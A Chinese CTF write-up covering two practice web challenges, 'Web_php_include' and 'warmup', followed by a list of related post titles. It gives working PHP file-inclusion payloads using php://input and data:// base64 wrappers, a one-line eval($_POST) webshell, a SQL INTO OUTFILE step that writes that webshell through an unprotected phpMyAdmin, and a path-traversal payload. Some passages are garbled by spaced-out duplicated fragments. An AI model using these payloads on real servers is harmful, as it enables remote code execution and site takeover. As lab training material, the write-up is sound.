记录攻防世界web进阶
Web_php_include
考点:考审计php代码的基本能力,以及绕开的能力
知识点:
1.两个函数
①str_replace(“php://”, “”, $page);替换函数
②strstr($page, “php://”)查找函数,即输出在一个字符串里面第一次出现的位置(且对大小写敏感)即绕开了
php://input功能应用 (接受请求的get或者post数据)
2.data协议的用法
3.数据库写马的方法
题目:
方法一:
利用strstr()的敏感大小进行绕过
代码
//get中
http://220.249.52.133:32881/?page=PHP://input
//post请求中## 标题
<?php system("ls"); ?>
<?php system("cat 路径的文件名"); ?>//即利用cat命令获取
方法二:
data://伪协议执行命令利用进行绕过
使用方法:data://text/plain;base64,xxxx(base64编码后的数据)
如
<?php system("dir")?> base64编码后使用进行
http://111.198.29.45:47062/?page=data://text/plain/;base64,PD9waHAgc3lzdGVtKCJkaXIisssKT8%2b (注意编码后的+号要URL编码)
方法三:
data://伪协议传木马
<?php eval($_POST[xiaohua]); ?> base64加密后拼接http://111.198.29.45:47062/?page=data://text/plain/;base64,PD9waHAgZXZhbCgkX1BPU1RbeGlhb2h1YV0pOyA/Pg==//菜刀连接即可
方法四:
数据库写入马,利用数据库进行
//御剑扫描获得phpmyadmin root 密码空 进入//数据库执行这条命令查看secure_file_priv是否为空,为空则可以写数据 如果是null不能写SHOW VARIABLES LIKE "secure_file_priv"linux默认tmp是可写目录 试试写入一句话马 菜刀连接 SELECT "<?php eval(@$_POST['xiaohua']); ?>"
INTO OUTFILE '/tmp/test1.php'
思路:①绕过代码审计中的替换即读取数据的命令
②在post中利用php的命令执行语句进行爆出flag
warmup
考点:
- 考php代码审计与构造的能力
- 考php路径访问的能力
- 参数与url中常见的符号理解
知识点:
1.#include文件包含的定义的漏洞使用类
作用:包含并运行指定的文件
运行方法:先按照参数的路径进行寻找,没有的话在依次删除路径
file的参数这个是#include里面的定义为文件=路径;(且文件打开还可以考虑用php://input)
2.函数
①in_array($page, $whitelist)即在whitelist中是否存在page这个参数
②mb_substr()函数的理解
mb_substr($page,0,mb_strpos($page . '?', '?'));//即参数从0开始返回mb_strpos这么多的字节
③mb_strpos():返回要查找的字符串在别一个字符串中首次出现的位置(即返回的位置,strstr返回的是值且是从当时开始的值)
<?php
$str = 'http://www.feiniaomy.com';
echo mb_strpos($str,'niao');
?>
//输出结果:14;
④参数的理解
如?file=source.php?(payload)//即参数$page实际为source.php?
做题:
审计代码后发现只有当 p a g e 的 参 数 构 造 存 在 于 page的参数构造存在于 page的参数构造存在于whitelist数组中存在时,才返回 true,否则都是flase
因此可以利用第二个判断机制构造 p a g e = s o u r c e . p h p ? 或 者 page=source.php?或者 page=source.php?或者page=hint.php
然后又利用#include的实际执行方法进行构造路径
为?file=source.php?/…/…/…/…/…/…/ffffllllaaaagggg
成功获取到flag
记录攻防世界web进阶相关推荐
- 攻防世界web进阶区Web_python_block_chain详解
攻防世界web进阶区Web_python_block_chain详解 题目 详解 51% 双花攻击 题目 详解 我们整理一下 Announcement: The server has been res ...
- 攻防世界web进阶区Web_php_wrong_nginx_config详解
攻防世界web进阶区Web_php_wrong_nginx_config详解 题目 详解 题目 打开发现无论我们输入什么他都会弹出网站建设不完全 那么我们使用御剑进行扫描,扫描到了admin和robo ...
- 攻防世界WEB进阶之ics-05
攻防世界WEB进阶之ics-05 1.描述 2.实操 3.答案 1.描述 难度系数: 3星 题目来源: XCTF 4th-CyberEarth 题目描述:其他破坏者会利用工控云管理系统设备维护中心的后 ...
- 攻防世界web进阶区ics-05详解
攻防世界web进阶区ics-05详解 题目 解法 preg_replace ctype_alnum strpos X-Forwarded-For 题目 我们只能点击一个地方 解法 御剑扫描有一个css ...
- 攻防世界-WEB进阶-ics-06(Burpsuite爆破使用)
前言 题目来源:攻防世界-WEB进阶----ics-06 使用工具:Burpsuite 题目 云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下入侵者的痕迹 分析 这里只有报表 ...
- 攻防世界WEB进阶之upload
攻防世界WEB进阶之upload 第一步:分析 第二步:实操 第三步:答案 第一步:分析 难度系数: 1星 题目来源: RCTF-2015 题目描述:暂无 脑洞很大的一题,首先题目什么都没给出,进入场 ...
- 攻防世界WEB进阶之upload1
攻防世界WEB进阶之upload1 一.分析 二.实操 三.答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 题目场景: 略 题目附件: 暂无 一.分析 首先打开场景,上传文件进行抓包操作,发 ...
- 攻防世界WEB进阶之Cat
攻防世界WEB进阶之Cat 第一步:分析 第二步:实操 第三步:答案 第一步:分析 难度系数: 2星 题目来源: XCTF 4th-WHCTF-2017 题目描述:抓住那只猫 首先题给出的信息抓住那只 ...
- 攻防世界web进阶区wtf.sh-150详解
攻防世界web进阶区wtf.sh-150详解 题目 详解 题目 看起来像一个论坛,可以注册,登录 详解 我们随便打开一个 尝试注入 并没有发现可以注入 注册发现,admin已经存在, 我们看看能不能二 ...
最新文章
- 近期活动盘点:数据化思维困局和0.01突破讲座、极简大数据决策,培养数据化思维讲座...
- oracle limsize,Oracle9i AIX上单进程占用内存过多问题
- VTK:PolyData之GetMiscPointData
- juqery代码优化
- 【专场】揭秘端到端视频技术
- layui列表筛选列_Shopify搜索产品并筛选产品列表功能介绍
- Hbuilder开发app实战-识岁06-face++的js实现【完结】
- Vue (响应式原理-模拟-0)
- ETL学习总结(1)——ETL 十大功能特性详解
- 新浪API, 利用get_uid获取是uid的数据溢出问题解决方案
- 融完5亿美元创始人出局?腾讯投资的明星无人车公司Zoox地震了
- 立即更新 Chrome 浏览器!这个 0day 已遭在野利用
- CentOS minimal 版安装图形界面的步骤分享,中文语言包
- yolov3从头实现(六)损失计算
- log4j和web.xml配置webAppRootKey 的问题(一个tomcat下部署多个应用)
- php酒店系统论文,基于PHP的酒店管理系统PHP1008(毕业设计+论文)
- 访问控制基础(DAC,MAC,RBAC,ABAC,BLP)
- 入侵提权过程中猜解linux路径与windows路径,网站路径暴力
- 谷歌VAD静音检测py-webrtcvad使用详解
- 软件实施:别把我想简单了